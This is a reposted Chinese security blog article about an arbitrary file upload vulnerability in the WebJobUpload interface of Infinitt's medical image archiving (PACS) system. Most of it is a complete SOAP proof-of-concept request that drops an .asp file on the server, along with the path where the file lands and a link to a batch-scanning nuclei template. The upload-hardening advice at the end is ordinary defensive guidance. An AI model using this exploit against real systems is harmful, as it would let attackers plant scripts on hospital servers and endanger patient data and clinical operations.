英飞达医学影像存档与通信系统任意文件上传

admin 2024年5月23日00:25:03评论35 views字数 1196阅读3分59秒阅读模式
01
0x01漏洞描述

英飞达医学影像存档与通信系统 WebJobUpload接口存在任意文件上传,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!

英飞达医学影像存档与通信系统任意文件上传

02
0x02 漏洞复现
POC如下所示:
POST /webservices/WebJobUpload.asmx HTTP/1.1Host: xxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateContent-Type: text/xml; charset=utf-8Soapaction: "http://rainier/jobUpload"Connection: closeContent-Length: 506

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <jobUpload xmlns="http://rainier"> <vcode>1</vcode> <subFolder></subFolder> <fileName>xfoward.asp</fileName> <bufValue>MTIzNDU2</bufValue> </jobUpload> </soap:Body></soap:Envelope>

链接地址如下所示:url+/1/xfoward.asp

英飞达医学影像存档与通信系统任意文件上传

03
0x03nuclei批量检测

英飞达医学影像存档与通信系统任意文件上传

获取方式:

链接:https://pan.baidu.com/s/1yaoh3ZCaaURhse4l4D3gjw?pwd=vno8 提取码:vno8

 修复建议

  1、对上传文件类型进行验证,除在前端验证外在后端依然要做验证,后端可以进行扩展名检测,重命名文件,MIME类型检测以及限制上传文件的大小等限制来防御,或是将上传的文件其他文件存储服务器中。

  2、严格限制和校验上传的文件,禁止上传恶意代码的文件。同时限制相关上传文件目录的执行权限,防止木马执行。

  3、对上传文件格式进行严格校验,防止上传恶意脚本文件;

  4、严格限制上传的文件路径。

  5、文件扩展名服务端白名单校验。

  6、文件内容服务端校验。

  7、上传文件重命名。

  8、隐藏上传文件路径。

原文始发于微信公众号(爱喝酒烫头的曹操):英飞达医学影像存档与通信系统任意文件上传

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月23日00:25:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   英飞达医学影像存档与通信系统任意文件上传http://cn-sec.com/archives/2766061.html

发表评论

匿名网友 填写信息